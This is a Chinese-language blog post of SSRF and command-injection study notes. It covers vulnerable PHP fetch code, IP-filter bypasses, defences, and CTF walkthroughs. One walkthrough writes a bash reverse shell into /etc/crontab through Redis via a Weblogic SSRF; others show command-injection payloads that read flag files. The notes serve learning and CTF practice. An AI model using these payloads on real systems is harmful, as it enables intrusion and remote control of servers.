<!DOCTYPE HTML>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="utf-8">
  <meta http-equiv="pragma" content="no-cache">
  <meta http-equiv="cache-control" content="no-cache">
  <meta http-equiv="expires" content="0">
  
  <title>Ssrf的一些笔记 | heyzm&#39; blog</title>
  <meta name="author" content="heyzm">
  
  <meta name="description" content="本文主要介绍我在学习ssrf的时候写的一些笔记">
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  <meta property="og:title" content="Ssrf的一些笔记">
  <meta property="og:site_name" content="heyzm&#39; blog">

  
    <meta property="og:image" content="">
  

  
  
    <link href="/favicon.png" rel="icon">
  
  
  <link rel="stylesheet" href="/css/bootstrap.min.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/font-awesome.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/style.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/responsive.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/highlight.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/google-fonts.css" media="screen" type="text/css">
  <!--[if lt IE 9]><script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->

  <script src="/js/jquery-2.0.3.min.js"></script>

  <!-- analytics -->
  
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
  ga('create', 'UA-70812759-1', 'auto');
  ga('send', 'pageview');
</script>



<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "//hm.baidu.com/hm.js?cb5448498d7169c668b07c2b255d62c1";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>


</head>
</html>
 <body>  
  <nav id="main-nav" class="navbar navbar-inverse navbar-fixed-top" role="navigation">
    <div class="container">
      <button type="button" class="navbar-header navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
		<span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
	  <a class="navbar-brand" href="/">heyzm&#39; blog</a>
      <div class="collapse navbar-collapse nav-menu">
		<ul class="nav navbar-nav">
		  
		  <li>
			<a href="/archives" title="All the articles.">
			  <i class=""></i>Archives
			</a>
		  </li>
		  
		  <li>
			<a href="/categories" title="All the categories.">
			  <i class=""></i>Categories
			</a>
		  </li>
		  
		  <li>
			<a href="/tags" title="All the tags.">
			  <i class=""></i>Tags
			</a>
		  </li>
		  
		  <li>
			<a href="/about" title="About me.">
			  <i class=""></i>About
			</a>
		  </li>
		  
		  <li>
			<a href="/atom.xml" title="Subscribe me.">
			  <i class=""></i>RSS
			</a>
		  </li>
		  
		</ul>
      </div>
    </div> <!-- container -->
</nav>
<div class="clearfix"></div>

  <div class="container">
  	<div class="content">
    	 


	
		<div class="page-header">
			<h1> Ssrf的一些笔记</h1>
		</div>
	



<div class="row post">
	<!-- cols -->
	
	<div id="top_meta"></div>
	<div class="col-md-9">
	

	<!-- content -->
	<div class="mypage">		
	  
		 <div class="alert alert-success description">
			<i class="fa fa-info-circle"></i> 本文主要介绍我在学习ssrf的时候写的一些笔记
		 </div> <!-- alert -->
	  		

	  <h4 id="0x00-概述"><a href="#0x00-概述" class="headerlink" title="0x00 概述"></a>0x00 概述</h4><p>通俗的来说就是我们可以”伪造”服务器端发起的请求，从而获取客户端所不能得到的数<br>据。SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对<br>目标地址做过滤与限制。比如从指定URL地址获取网页文本内容，加载指定地址的图片，<br>下载等等。<br>ngrok</p>
<p><img src="https://thumbnail0.baidupcs.com/thumbnail/7229651c3353e04639f90e3ea9b70cc7?fid=1496317910-250528-281251924411733&amp;time=1545559200&amp;rt=sh&amp;sign=FDTAER-DCb740ccc5511e5e8fedcff06b081203-BtnNqmDh3crCWzhUVZ543NOqJ%2BA%3D&amp;expires=8h&amp;chkv=0&amp;chkbd=0&amp;chkpc=&amp;dp-logid=8274196748596364906&amp;dp-callid=0&amp;size=c710_u400&amp;quality=100&amp;vuk=-&amp;ft=video" alt="image"></p>
<h4 id="0x01-SSRF漏洞详解"><a href="#0x01-SSRF漏洞详解" class="headerlink" title="0x01 SSRF漏洞详解"></a>0x01 SSRF漏洞详解</h4><ul>
<li>可以对外网、服务器所在内网、本地进行端口扫描，获取一些服务的banner信息;</li>
<li>攻击运行在内网或本地的应用程序（比如溢出）;</li>
<li>对内网web应用进行指纹识别，通过访问默认文件实现;</li>
<li>攻击内外网的web应用，主要是使用get参数就可以实现的攻击（比如struts2，sqli等）;</li>
<li>利用file协议读取本地文件等。</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'url'</span>]))</span><br><span class="line">&#123;</span><br><span class="line">$content = file_get_contents($_POST[<span class="string">'url'</span>]);</span><br><span class="line">$filename =<span class="string">'./images/'</span>.rand().<span class="string">';img1.jpg'</span>;</span><br><span class="line">file_put_contents($filename, $content);</span><br><span class="line"><span class="keyword">echo</span> $_POST[<span class="string">'url'</span>];</span><br><span class="line">$img = <span class="string">"&lt;img src=\""</span>.$filename.<span class="string">"\"/&gt;"</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">echo</span> $img;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>这段代码使用<br>file_get_contents函数从<br>用户指定的url获取图片。<br>然后把它用一个随即文件<br>名保存在硬盘上，并展示<br>给用户</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">GetFile</span><span class="params">($host,$port,$link)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">$fp = fsockopen($host, intval($port), $errno, $errstr, <span class="number">30</span>);</span><br><span class="line"><span class="keyword">if</span> (!$fp) &#123;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"$errstr (error number $errno) \n"</span>;</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">$out = <span class="string">"GET $link HTTP/1.1\r\n"</span>;</span><br><span class="line">$out .= <span class="string">"Host: $host\r\n"</span>;</span><br><span class="line">$out .= <span class="string">"Connection: Close\r\n\r\n"</span>;</span><br><span class="line">$out .= <span class="string">"\r\n"</span>;</span><br><span class="line">fwrite($fp, $out);</span><br><span class="line">$contents=<span class="string">''</span>;</span><br><span class="line"><span class="keyword">while</span> (!feof($fp)) &#123;</span><br><span class="line">$contents.= fgets($fp, <span class="number">1024</span>);</span><br><span class="line">&#125;</span><br><span class="line">fclose($fp);</span><br><span class="line"><span class="keyword">return</span> $contents;</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>这段代码使用fsockopen<br>函数实现获取用户制定<br>url的数据（文件或者<br>html）。这个函数会使<br>用socket跟服务器建立<br>tcp连接，传输原始数据。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">if (isset($_POST[&apos;url&apos;]))</span><br><span class="line">&#123;</span><br><span class="line">$link = $_POST[&apos;url&apos;];</span><br><span class="line">$curlobj = curl_init();</span><br><span class="line">curl_setopt($curlobj, CURLOPT_POST, 0);</span><br><span class="line">curl_setopt($curlobj,CURLOPT_URL,$link);</span><br><span class="line">curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1);</span><br><span class="line">$result=curl_exec($curlobj);</span><br><span class="line">curl_close($curlobj);</span><br><span class="line">$filename = &apos;./curled/&apos;.rand().&apos;.txt&apos;;</span><br><span class="line">file_put_contents($filename, $result);</span><br><span class="line">echo $result;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>这是另外一个很常见的<br>实现。使用curl获取数据。</p>
<h5 id="SSRF端口扫描"><a href="#SSRF端口扫描" class="headerlink" title="SSRF端口扫描"></a>SSRF端口扫描</h5><ul>
<li>正常情况下,请求<a href="http://www.twitter.com/robots.txt返回结果如下" target="_blank" rel="noopener">http://www.twitter.com/robots.txt返回结果如下</a>:<br><img src="https://thumbnail0.baidupcs.com/thumbnail/fb29e67af8a05a86e7bac13d5224a2ce?fid=1496317910-250528-682233490812395&amp;time=1545559200&amp;rt=sh&amp;sign=FDTAER-DCb740ccc5511e5e8fedcff06b081203-jMQ%2FxyzBMB1cyitf0m5dHbmCwWM%3D&amp;expires=8h&amp;chkv=0&amp;chkbd=0&amp;chkpc=&amp;dp-logid=203950732052802931&amp;dp-callid=0&amp;size=c710_u400&amp;quality=100&amp;vuk=-&amp;ft=video4" alt="image"></li>
<li>请求非http服务的端口,比如:<a href="http://scanme.nmap.org:22/test" target="_blank" rel="noopener">http://scanme.nmap.org:22/test</a> 会返回banner信息<br><img src="http://m.qpic.cn/psb?/V13E3QPK2JMxz7/CfSFJVsqjMKMF5GvKF8iO9H1a6RRBhc8CzN9stuOJ*k!/b/dFUAAAAAAAAA&amp;bo=UgWAAtYFvgIDCZY!&amp;rf=viewer_4" alt="image"></li>
<li>请求关闭的端口会报错:<a href="http://scannme.nmap.org:25/test.txt" target="_blank" rel="noopener">http://scannme.nmap.org:25/test.txt</a><br><img src="http://m.qpic.cn/psb?/V13E3QPK2JMxz7/3oMQQFAIdjlXoOmTWZj7TSo*CmVdSE82gmclBwa0IQk!/b/dFMBAAAAAAAA&amp;bo=ZAYyAmQGMgIDCSw!&amp;rf=viewer_4" alt="image"></li>
<li>内网web应用指纹识别<blockquote>
<p>识别内网应用使用的框架,平台,模块以及cms可以为后续的攻击提供很多帮助。大多数web应用框架都有一些独特的文件和目录。通过这些文件可以识别出应用的类型,甚至详细的版本.根据这些信息就可以针对性的搜集漏洞进行攻击。比如可以通过访问下列文件来判断phpMyAdmin是否安装:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Request : http://127.0.0.1:8080/phpMyAdmin/themes/original/img/b_tblimport.png</span><br><span class="line">Request : http://127.0.0.1:8081/wp-content.themes/default/images/audio.jpg</span><br><span class="line">Request : http://127.0.0.1:8082/profiles/minimal/translations/README.txt</span><br></pre></td></tr></table></figure>
</blockquote>
</li>
</ul>
<p>访问 <a href="http://10.0.0.1/portName.js" target="_blank" rel="noopener">http://10.0.0.1/portName.js</a> 可判断是否为Dlink路由器</p>
<blockquote>
<p>下面百度的案例来自于wooyun,已经修复。通过<a href="http://10.50.33.43:8080/manager/images/tomcat.gif识别出使用了tomcat" target="_blank" rel="noopener">http://10.50.33.43:8080/manager/images/tomcat.gif识别出使用了tomcat</a><br><img src="http://m.qpic.cn/psb?/V13E3QPK2JMxz7/P.d2cPeqvmAxtl2MAcyJwnSH5xPrBf6v0POJoAM1J.U!/b/dFQBAAAAAAAA&amp;bo=nAbEA5wGxAMRCT4!&amp;rf=viewer_4" alt="image"></p>
</blockquote>
<ul>
<li><p>攻击内网web应用<br><img src="http://m.qpic.cn/psb?/V13E3QPK2JMxz7/WYl2UOFXsH.*gpjmVv2DgdicP87jSDTWiDi4m.NeO5o!/b/dDYBAAAAAAAA&amp;bo=yAaaBMgGmgQRGS4!&amp;rf=viewer_4" alt="image"><br><img src="http://m.qpic.cn/psb?/V13E3QPK2JMxz7/fQNm5ZeThn7KmDklkIdnUmSXF3TX*ZcugQxhF.h0bPw!/b/dDUBAAAAAAAA&amp;bo=lAZ6A5QGegMRGS4!&amp;rf=viewer_4" alt="image"><br><img src="http://m.qpic.cn/psb?/V13E3QPK2JMxz7/iv4rC5P5pjcTkG0XXCv6VJoRxPl41rn8A4FajpN1Kag!/b/dFQBAAAAAAAA&amp;bo=AgaMAwIGjAMRGS4!&amp;rf=viewer_4" alt="image"><br><img src="http://m.qpic.cn/psb?/V13E3QPK2JMxz7/ECwAFqc3GnPqgNUd21feRsVqtvV4okHEIYZIkcInT7o!/b/dFUAAAAAAAAA&amp;bo=TgaeA04GngMRGS4!&amp;rf=viewer_4" alt="image"></p>
</li>
<li><p>绕过IP限制的方法</p>
<blockquote>
<p>编码 例如192.168.0.1</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">8进制格式：0300.0250.0.1</span><br><span class="line">16进制格式：0xC0.0xA8.0.1</span><br><span class="line">10进制整数格式：3232235521</span><br><span class="line">16进制整数格式：0xC0A80001</span><br></pre></td></tr></table></figure>
</blockquote>
</li>
</ul>
<blockquote>
<p>利用解析url所出现的问题<br>在某些情况下，后端程序可能会对访问的URL进行解析，对<br>解析出来的host地址进行过滤。这时候可能会出现对URL参数解析<br>不当，导致可以绕过过滤。</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://www.baidu.com@192.168.0.1/</span><br></pre></td></tr></table></figure>
<blockquote>
<p>利用302跳转</p>
<blockquote>
<p>在网络上存在一个很神奇的服务，<a href="http://xip.io" target="_blank" rel="noopener">http://xip.io</a> 当我们访问这<br>个网站的子域名的时候，例如192.168.0.1.xip.io，就会自动重定向到<br>192.168.0.1。<br>由于上述方法中包含了192.168.0.1这种内网IP地址，可能会<br>被正则表达式过滤掉，我们可以通过短地址的方式来绕过。经过测试发<br>现新浪，百度的短地址服务并不支持IP模式，所以这里使用的是<br><a href="http://tinyurl.com所提供的短地址服务" target="_blank" rel="noopener">http://tinyurl.com所提供的短地址服务</a></p>
</blockquote>
</blockquote>
<blockquote>
<p>通过各种非HTTP协议</p>
<blockquote>
<p>如果服务器端程序对访问URL所采用的协议进行验证的话，可以<br>通过非HTTP协议来进行利用。<br>GOPHER协议：通过GOPHER我们在一个URL参数中构造Post<br>或者Get请求，从而达到攻击内网应用的目的。例如我们可以使用<br>GOPHER协议对与内网的Redis服务进行攻击。<br>File协议：File协议主要用于访问本地计算机中的文件，我们可以<br>通过类似file:///文件路径这种格式来访问计算机本地文件。使用file协<br>议可以避免服务端程序对于所访问的IP进行的过滤。例如我们可以通<br>过file:///d:/1.txt 来访问D盘中1.txt的内容</p>
</blockquote>
</blockquote>
<h3 id="0x02-防御方法"><a href="#0x02-防御方法" class="headerlink" title="0x02 防御方法"></a>0x02 防御方法</h3><ul>
<li>过滤返回信息，验证远程服务器对请求的响应是比较容易的方法。<br>如果web应用是去获取某一种类型的文件。那么在把返回结果展示给<br>用户之前先验证返回的信息是否符合标准。</li>
<li>统一错误信息，避免用户可以根据错误信息来判断远端服务器的端<br>口状态。</li>
<li>限制请求的端口为http常用的端口，比如，80,443,8080,8090。</li>
<li>黑名单内网ip。避免应用被用来获取获取内网数据，攻击内网。</li>
<li>禁用不需要的协议。仅仅允许http和https请求。可以防止类似于<br>file:///,gopher://,ftp:// 等引起的问题。</li>
</ul>
<h3 id="0x03-例题"><a href="#0x03-例题" class="headerlink" title="0x03 例题"></a>0x03 例题</h3><h5 id="104-153-100-14-7001-Flag在172-19-0-2根目录下"><a href="#104-153-100-14-7001-Flag在172-19-0-2根目录下" class="headerlink" title="104.153.100.14:7001 Flag在172.19.0.2根目录下"></a>104.153.100.14:7001 Flag在172.19.0.2根目录下</h5><ul>
<li><p>SSRF漏洞存在于<br><a href="http://104.153.100.14:7001/uddiexplorer/SearchPublicRegistries.jsp，我们在brupsuite下测试该漏洞。访问一个可以访问的" target="_blank" rel="noopener">http://104.153.100.14:7001/uddiexplorer/SearchPublicRegistries.jsp，我们在brupsuite下测试该漏洞。访问一个可以访问的</a><br>IP:PORT，如<a href="http://127.0.0.1:80" target="_blank" rel="noopener">http://127.0.0.1:80</a><br><img src="http://m.qpic.cn/psb?/V13E3QPK2JMxz7/E7QLB8UKLew*ZtE6GX2gXArmohPEfXDDg5OpJ4343Ak!/b/dDYBAAAAAAAA&amp;bo=LAfqASwH6gERCT4!&amp;rf=viewer_4" alt="image"></p>
</li>
<li><p>修改为一个不存在的端口，将会返回could not connect over<br>HTTP to server。<br><img src="http://m.qpic.cn/psb?/V13E3QPK2JMxz7/lmmkmVc5yQqdI2IcO5451frHUm44xgX6z2TvD*RBoS4!/b/dDYBAAAAAAAA&amp;bo=gAeKAYAHigERCT4!&amp;rf=viewer_4" alt="image">)</p>
</li>
</ul>
<h6 id="注入HTTP头，利用Redis反弹shell"><a href="#注入HTTP头，利用Redis反弹shell" class="headerlink" title="注入HTTP头，利用Redis反弹shell"></a>注入HTTP头，利用Redis反弹shell</h6><ul>
<li>Weblogic的SSRF有一个比较大的特点，其虽然是一个“GET”请<br>求，但是我们可以通过传入%0a%0d来注入换行符，而某些服务<br>（如redis）是通过换行符来分隔每条命令，也就说我们可以通过<br>该SSRF攻击内网中的redis服务器。</li>
<li><p>首先，通过ssrf探测内网中的redis服务器（docker环境的网段一<br>般是172.<em>），发现172.19.0.2:6379可以连通<br>![image](<a href="http://m.qpic.cn/psb?/V13E3QPK2JMxz7/" target="_blank" rel="noopener">http://m.qpic.cn/psb?/V13E3QPK2JMxz7/</a></em>q96D2ZAr0bEJAlxi4rq6lWi3jfRQrEnqPeUFJ.y0BQ!/b/dDMBAAAAAAAA&amp;bo=gAe4AYAHuAERGS4!&amp;rf=viewer_4)</p>
</li>
<li><p>发送三条redis命令，将弹shell脚本写入/etc/crontab：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">set 1 &quot;\n\n\n\n* * * * * root bash -i &gt;&amp; /dev/tcp/172.18.0.1/21</span><br><span class="line">0&gt;&amp;1\n\n\n\n&quot; config set dir /etc/ config set dbfilename crontab</span><br><span class="line">save</span><br></pre></td></tr></table></figure>
</li>
</ul>
<h3 id="Crontab"><a href="#Crontab" class="headerlink" title="Crontab"></a>Crontab</h3><ul>
<li>crontab命令用于设置周期性被执行的指令。该命令从标准输入<br>设备读取指令，并将其存放于“crontab”文件中，以供之后读取<br>和执行。</li>
<li>crontab文件一般位于/etc/下，这里面存放系统运行的的调度程序。<br><img src="http://m.qpic.cn/psb?/V13E3QPK2JMxz7/a.5Ij9.sNh6izeuME5T3JTkHZOfr4ULCLKOqmt1XN0A!/b/dD4BAAAAAAAA&amp;bo=FAU8AhQFPAIRCT4!&amp;rf=viewer_4" alt="image"><blockquote>
<p>查看当前用户的定时任务</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[oracle@localhost ~]$ crontab -l</span><br><span class="line">* * * * * /home/oracle/test.sh &gt;/dev/null 2&gt;&amp;1</span><br></pre></td></tr></table></figure>
</blockquote>
</li>
</ul>
<blockquote>
<p>编辑当前用户的定时任务</p>
</blockquote>
<blockquote>
<blockquote>
<p>可以在编辑状态修改、删除、新增一些定时任务。注释一般用#<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[oracle@localhost ~]$ crontab -e</span><br></pre></td></tr></table></figure></p>
</blockquote>
</blockquote>
<blockquote>
<p>删除当前用户的定时任务<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">[root@localhost ~]# crontab -r</span><br><span class="line">[root@localhost ~]# crontab -l</span><br><span class="line">no crontab for root</span><br></pre></td></tr></table></figure></p>
</blockquote>
<blockquote>
<p>当前用户的计划任务<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">crontab -l 查看计划任务-r 删除所有定时计划任务-e 编辑计划</span><br><span class="line">任务</span><br></pre></td></tr></table></figure></p>
</blockquote>
<p>注意，换行符是“\r\n”，也就是“%0D%0A”。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">将url编码后的字符串放在ssrf的域名后面，发送：</span><br><span class="line">GET</span><br><span class="line">/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&amp;txtSearc</span><br><span class="line">hname=sdf&amp;txtSearchkey=&amp;txtSearchfor=&amp;selfor=Business+location</span><br><span class="line">&amp;btnSubmit=Search&amp;operator=http://172.19.0.2:6379/test%0D%0A</span><br><span class="line">%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20</span><br><span class="line">*%20*%20root%20bash%20-</span><br><span class="line">i%20%3E%26%20%2Fdev%2Ftcp%2F172.18.0.1%2F21%200%3E</span><br><span class="line">%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%2</span><br><span class="line">0%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0</span><br><span class="line">D%0Asave%0D%0A%0D%0Aaaa</span><br></pre></td></tr></table></figure></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">HTTP/1.1 Host: localhost Accept: */* Accept-Language: en User-</span><br><span class="line">Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64;</span><br><span class="line">x64; Trident/5.0) Connection: close</span><br></pre></td></tr></table></figure>
<p><img src="http://m.qpic.cn/psb?/V13E3QPK2JMxz7/Mm1Zuer4PMw6txpyZCb19vUOt1hghyy2AYDyoY1mzJk!/b/dDQBAAAAAAAA&amp;bo=NwWAAowHngMRCZg!&amp;rf=viewer_4" alt="image"></p>
<h3 id="0x04-拓展"><a href="#0x04-拓展" class="headerlink" title="0x04 拓展"></a>0x04 拓展</h3><ul>
<li>最后补充一下，可进行利用的cron有如下几个地方</li>
<li>/etc/crontab 这个是肯定的</li>
<li>/etc/cron.d/* 将任意文件写到该目录下，效果和crontab相同，格<br>式也要和/etc/crontab相同。漏洞利用这个目录，可以做到不覆盖<br>任何其他文件的情况进行弹shell。</li>
<li>/var/spool/cron/root centos系统下root用户的cron文件</li>
<li>/var/spool/cron/crontabs/root debian系统下root用户的cron文件</li>
</ul>
<h4 id="命令执行"><a href="#命令执行" class="headerlink" title="命令执行"></a>命令执行</h4><p>应用有时需要调用一些执行系统命令的函数，如<br>PHP中的system、exec、shell_exec、passthru、<br>popen、proc_popen等，当用户能控制这些函数<br>中的参数时，就可以将恶意系统命令拼接到正常<br>命令中，从而造成命令执行攻击，这就是命令执行<br>漏洞。</p>
<h4 id="利用条件"><a href="#利用条件" class="headerlink" title="利用条件"></a>利用条件</h4><p>应用调用执行系统命令的函数<br>将用户输入作为系统命令的参数拼接到了命令行中<br>没有对用户输入进行过滤或过滤不严</p>
<h4 id="漏洞分类"><a href="#漏洞分类" class="headerlink" title="漏洞分类"></a>漏洞分类</h4><ul>
<li>代码层过滤不严：<br>商业应用的一些核心代码封装在二进制文<br>件中，在web应用中通过system函数来调<br>用：<br>system(“/bin/program –arg $arg”);</li>
<li>系统的漏洞造成命令注入<br>bash破壳漏洞(CVE-2014-6271)</li>
<li>调用的第三方组件存在代码执行漏洞<br>如WordPress中用来处理图片的<br>ImageMagick组件<br>JAVA中的命令执行漏洞<br>(struts2/ElasticsearchGroovy等)<br>ThinkPHP命令执行<h4 id="漏洞危害"><a href="#漏洞危害" class="headerlink" title="漏洞危害"></a>漏洞危害</h4>继承Web服务程序的权限去执行系统命令或读写文件<br>反弹shell<br>控制整个网站甚至控制服务器<br>进一步内网渗透<br>等等</li>
<li>system(“$arg”); //直接输入即可</li>
<li>system(“/bin/prog $arg”); //直接输入;ls</li>
<li>system(“/bin/prog -p $arg”); //和2一样</li>
<li>system(“/bin/prog –p=\”$arg\””); //可以输入”;ls;”</li>
<li>system(“/bin/prog –p=’$arg’”); //可以输入’;ls;’<blockquote>
<p>在Linux上，上面的;也可以用|、||代替;前面的执行完执行后面的|<br>是管道符，显示后面的执行结果||当前面的执行出错时执行后面的</p>
</blockquote>
</li>
</ul>
<blockquote>
<p>在Windows上，不能用;可以用&amp;、&amp;&amp;、|、||代替&amp;前面的语句为假<br>则直接执行后面的&amp;&amp;前面的语句为假则直接出错，后面的也不执<br>行|直接执行后面的语句||前面出错执行后面的</p>
</blockquote>
<h4 id="题目"><a href="#题目" class="headerlink" title="题目"></a>题目</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http://217.182.73.250:7999/</span><br><span class="line">127.0.0.1;ls </span><br><span class="line">127.0.0.1;cat flag.php</span><br></pre></td></tr></table></figure>
<p><img src="http://m.qpic.cn/psb?/V13E3QPK2JMxz7/Kuxg7D*lt11B1qu8dLYT.4hPi85npCQh3BSzFknUUFo!/b/dDQBAAAAAAAA&amp;bo=ZgSQAWYEkAERCT4!&amp;rf=viewer_4" alt="image"><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http://217.182.73.250:8001/</span><br><span class="line"></span><br><span class="line">?number=eval(system(&quot;cat where/is/the/flag/i/am/looking/for/flag.php&quot;))</span><br></pre></td></tr></table></figure></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://hackme.inndy.tw/ping/</span><br></pre></td></tr></table></figure>
<p><img src="http://r.photo.store.qq.com/psb?/V13E3QPK2JMxz7/IkQrWwrfRVFnU5eZ79l1h8yolqdg89f71DaQxlf1Kww!/r/dDYBAAAAAAAA" alt="image"></p>
<p>发现我们要使用的常用命令注入符号”;”,”|”,”&amp;”被过滤了<br>使用反引号 列目录 <code>ls</code><br><img src="http://r.photo.store.qq.com/psb?/V13E3QPK2JMxz7/cMZt2Dzd5aAkAAbQXJ*A974E3j48RCwOKv1keOPzxU8!/r/dFMBAAAAAAAA" alt="image"><br>发现我们要使用的常用命令注入符号”;”,”|”,”&amp;”被过滤了<br><img src="http://m.qpic.cn/psb?/V13E3QPK2JMxz7/uf.lj1Cg6yn*3RDWu4p1OViZeX8frtytbBAoL53OJlM!/b/dDQBAAAAAAAA&amp;bo=GgS2ABoEtgARCT4!&amp;rf=viewer_4" alt="image"></p>
<p>Payload：<code>tac ?la?.?hp</code></p>
<p>Payload: Payload：<code>tac f*</code></p>
<p>Payload：<code>head f*</code></p>
<h4 id="Git-hack"><a href="#Git-hack" class="headerlink" title="Git-hack"></a>Git-hack</h4><p><img src="http://m.qpic.cn/psb?/V13E3QPK2JMxz7/N7ZSpewlgT52aYaS8fsQ*vvYqLPusR55UVJNpLwk2Qs!/b/dDcBAAAAAAAA&amp;bo=NgXAAjYFwAIRCT4!&amp;rf=viewer_4" alt="image"><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">http://120.26.131.152:32798/?page=flag&apos;.system(</span><br><span class="line">&quot;ls templates/;&quot;).&apos;</span><br><span class="line">http://120.26.131.152:32798//?page=</span><br><span class="line">flag&apos;.system(&quot;cat templates/flag.php;&quot;).’</span><br><span class="line">?page=&apos;.system(&quot;tac templates/flag.php&quot;).&apos;</span><br></pre></td></tr></table></figure></p>
	  
	</div>

	<div>
  	<center>
	<div class="pagination">

    
</div>

    </center>
	</div>
	
	<!-- comment -->
	
<section id="comment">
    <h2 class="title">Comments</h2>

    
</section>


	</div> <!-- col-md-9/col-md-12 -->
		
	
	<div id="side_meta">
		<div class="col-md-3" id="post_meta"> 

	<!-- date -->
	
	<div class="meta-widget">
	<i class="fa fa-clock-o"></i>
	2018-08-10 
	</div>
	

	<!-- categories -->
    
	<div class="meta-widget">
